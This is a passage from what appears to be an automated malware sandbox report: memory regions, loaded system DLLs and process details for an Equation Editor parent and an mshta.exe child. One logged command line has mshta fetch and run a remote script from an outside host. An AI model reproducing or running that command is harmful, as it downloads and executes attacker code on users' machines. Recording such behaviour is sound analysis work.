region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 369 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 370 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 371 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 372 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 373 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 374 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 375 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 376 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 377 start_va = 0x76e40000 end_va = 0x76eebfff 
entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 378 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 379 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 380 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 381 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 382 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 383 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 384 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 385 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 386 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 387 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 388 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000005a0000" filename = "" Region: id = 389 start_va = 0x12f0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 390 start_va = 0x1300000 end_va = 0x16fffff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 391 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 392 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 393 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 394 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 395 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 396 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 397 start_va = 0x18f0000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x00000000018f0000" filename = "" Region: id = 398 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: 
"c:\\windows\\system32\\oleaut32.dll") Region: id = 399 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 400 start_va = 0x1700000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 401 start_va = 0x1930000 end_va = 0x1a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 402 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 403 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 404 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 405 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 406 start_va = 0x1a30000 end_va = 0x1cfefff entry_point = 0x1a30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 407 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 408 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 409 start_va = 
0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 410 start_va = 0x1800000 end_va = 0x187ffff entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 411 start_va = 0x1d00000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 412 start_va = 0x1e00000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 413 start_va = 0x1f00000 end_va = 0x1fbffff entry_point = 0x1f00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 414 start_va = 0x20c0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 415 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 416 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 417 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 13 os_tid = 0x9f8 Thread: id = 14 os_tid = 0x9fc Thread: id = 15 os_tid = 0xa00 Thread: id = 16 os_tid = 0xa04 Thread: id = 17 os_tid = 0xa08 Process: id = "3" image_name = "mshta.exe" filename = "c:\\windows\\system32\\mshta.exe" page_root = "0x7f1e66a0" os_pid = "0xa18" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9f4" cmd_line = "mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" cur_dir = 
"C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 418 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 419 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 420 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 421 start_va = 0x2b0000 end_va = 0x2befff entry_point = 0x2b0000 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe") Region: id = 422 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 423 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 424 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 425 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 426 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffde000" filename = "" Region: id = 427 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 428 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 429 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 430 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 431 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 432 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 433 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 434 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 435 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 436 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 437 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 438 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 439 start_va = 0x410000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 440 start_va = 0x63150000 end_va = 0x63706fff entry_point = 0x63150000 region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll") Region: id = 441 start_va = 0x77110000 end_va = 0x77114fff entry_point = 0x77110000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 442 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 443 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 444 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 445 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 446 start_va = 0x766f0000 end_va = 0x7684bfff entry_point = 0x766f0000 region_type = mapped_file name = "ole32.dll" 
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 447 start_va = 0x76490000 end_va = 0x765c5fff entry_point = 0x76490000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 448 start_va = 0x76cf0000 end_va = 0x76de4fff entry_point = 0x76cf0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 449 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 450 start_va = 0x75610000 end_va = 0x7580afff entry_point = 0x75610000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 451 start_va = 0x75580000 end_va = 0x7560efff entry_point = 0x75580000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 452 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 453 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 454 start_va = 0x6eaa0000 end_va = 0x6eac9fff entry_point = 0x6eaa0000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 455 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 
region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 456 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 457 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 458 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 459 start_va = 0xc0000 end_va = 0xdcfff entry_point = 0xc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 460 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 461 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 462 start_va = 0x5a0000 end_va = 0x6a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 463 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 464 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 465 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 466 start_va = 0xd0000 end_va = 0xd0fff entry_point = 
0xd0000 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\System32\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\mshta.exe.mui") Region: id = 467 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 468 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 469 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 470 start_va = 0x13f0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 471 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 472 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 473 start_va = 0x76df0000 end_va = 0x76e34fff entry_point = 0x76df0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 474 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 475 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 476 start_va = 0x220000 end_va = 0x27bfff entry_point = 0x220000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 477 start_va = 0x220000 
end_va = 0x27bfff entry_point = 0x220000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 478 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 479 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 480 start_va = 0x12b0000 end_va = 0x138efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 481 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 482 start_va = 0x14f0000 end_va = 0x17befff entry_point = 0x14f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 483 start_va = 0x260000 end_va = 0x267fff entry_point = 0x260000 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 484 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 485 start_va = 0x76ab0000 end_va = 0x76b32fff entry_point = 0x76ab0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 486 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 487 
start_va = 0x290000 end_va = 0x290fff entry_point = 0x290000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 488 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 489 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 490 start_va = 0x290000 end_va = 0x290fff entry_point = 0x290000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 491 start_va = 0x2c0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 492 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 493 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 494 start_va = 0x2d0000 end_va = 0x2d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 495 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 496 start_va = 0x2e0000 end_va = 0x2e0fff entry_point 
= 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 497 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 498 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x2f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 499 start_va = 0x300000 end_va = 0x307fff entry_point = 0x300000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 500 start_va = 0x4e0000 end_va = 0x4ebfff entry_point = 0x4e0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 501 start_va = 0x770d0000 end_va = 0x77104fff entry_point = 0x770d0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 502 start_va = 0x77090000 end_va = 0x77095fff entry_point = 0x77090000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 503 start_va = 0x4f0000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 504 start_va = 0x749f0000 end_va = 0x74a33fff 
entry_point = 0x749f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 505 start_va = 0x17c0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 506 start_va = 0x733c0000 end_va = 0x733dbfff entry_point = 0x733c0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 507 start_va = 0x733b0000 end_va = 0x733b6fff entry_point = 0x733b0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 508 start_va = 0x1a30000 end_va = 0x1b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 509 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 510 start_va = 0x72930000 end_va = 0x72981fff entry_point = 0x72930000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 511 start_va = 0x72910000 end_va = 0x72924fff entry_point = 0x72910000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 512 start_va = 0x73820000 end_va = 0x7382cfff entry_point = 0x73820000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 513 start_va = 0x1860000 end_va = 0x195ffff entry_point = 0x0 region_type = private name = "private_0x0000000001860000" filename = "" Region: id = 514 start_va = 0x19b0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = 
